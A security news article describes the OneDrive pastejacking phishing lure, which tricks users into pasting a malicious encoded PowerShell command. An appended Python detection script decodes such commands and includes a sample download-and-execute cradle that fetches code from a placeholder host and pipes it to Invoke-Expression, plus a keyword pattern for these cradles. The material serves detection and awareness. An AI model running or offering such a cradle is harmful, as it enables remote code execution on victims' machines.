Stratos Ally

OneDrive Phishing Scam Lures Victims to Execute Harmful PowerShell Code 


StratosAlly


Cybersecurity researchers have spotted a new phishing trick aimed at Microsoft OneDrive users. 
Cybersecurity company Trellix calls this scheme “OneDrive Pastejacking.” Trellix security researcher Rafael Pena said that it uses clever social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems. 
The scam starts with an email that has an HTML file. When you open it, you see a fake OneDrive page with an error message about a DNS problem. It says: “Failed to connect to the ‘OneDrive’ cloud service. To fix the error, you need to update the DNS cache manually.” 
The message also comes with two options, namely “How to fix” and “Details,” with the latter directing the email recipient to a legitimate Microsoft Learn page on troubleshooting DNS. If users select the “How to fix” option, they’re led through a series of steps. The instructions guide them to open the Quick Link menu using the “Windows Key + X” shortcut, then open PowerShell. The final step asks them to paste a Base64-encoded command, claiming it will resolve the issue. In reality, the command is malicious: it downloads and launches harmful software on the victim’s machine, compromising their system security. 
This scam has been seen in many countries like the U.S., South Korea, Germany, and the U.K. 
Other security companies have reported similar tricks called ClickFix. This shows that these kinds of attacks are becoming more common. Threat actors keep coming up with new ways to get past Secure Email Gateways (SEGs). 
One recent trick hides HTML payloads as MPEG files inside ZIP archives to deliver the Formbook malware using DBatLoader. These changing tactics show the ongoing back-and-forth between cybercriminals and security experts. This means we need to stay alert and keep our security measures up to date. 
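A detection-side check for the behaviour described above, written here as an added example (it is not code from Trellix or from this article): the script decodes a pasted `-EncodedCommand` payload from process-creation events and flags the combination the pastejacking lure produces, namely an encoded command launched interactively from explorer.exe that contains a download-and-execute cradle. The event records and the indicator list are constructed for illustration; the field names `parent` and `cmd` are assumptions standing in for Sysmon Event ID 1 or Security 4688 fields.

```python
import base64
import re

# Constructed sample events (not from the article): parent process plus the
# PowerShell command line, as a Sysmon EID 1 / Security 4688 collector would log them.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",          # user opened PowerShell via Win+X
     "cmd": "powershell.exe -enc " + base64.b64encode(
         "Invoke-WebRequest http://example.invalid/p.txt | Invoke-Expression"
         .encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\System32\services.exe",  # scheduled/service launch, benign script
     "cmd": "powershell.exe -EncodedCommand "
            + base64.b64encode("Get-Date".encode("utf-16-le")).decode()},
    {"parent": r"C:\Windows\explorer.exe",          # interactive but plain-text, legitimate
     "cmd": "powershell.exe -NoProfile -Command Clear-DnsClientCache"},
]

# powershell.exe accepts abbreviated forms of -EncodedCommand; capture the Base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-and-execute indicators worth surfacing in a decoded script.
SUSPICIOUS = re.compile(
    r"invoke-expression|\biex\b|invoke-webrequest|\biwr\b|downloadstring|downloadfile|frombase64string",
    re.I)


def decode_encoded_command(cmdline):
    """Return the decoded script when cmdline carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # -EncodedCommand payloads are Base64 over UTF-16LE text.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return the list of reasons an event looks like pastejacking; empty means benign."""
    reasons = []
    script = decode_encoded_command(event["cmd"])
    if script is None:
        return reasons
    reasons.append("encoded command")
    if event["parent"].lower().endswith("explorer.exe"):
        reasons.append("interactive launch from explorer.exe")
    hits = sorted({h.lower() for h in SUSPICIOUS.findall(script)})
    if hits:
        reasons.append("download/execute cradle: " + ", ".join(hits))
    return reasons


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["cmd"][:40], "->", score_event(ev) or "benign")
```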
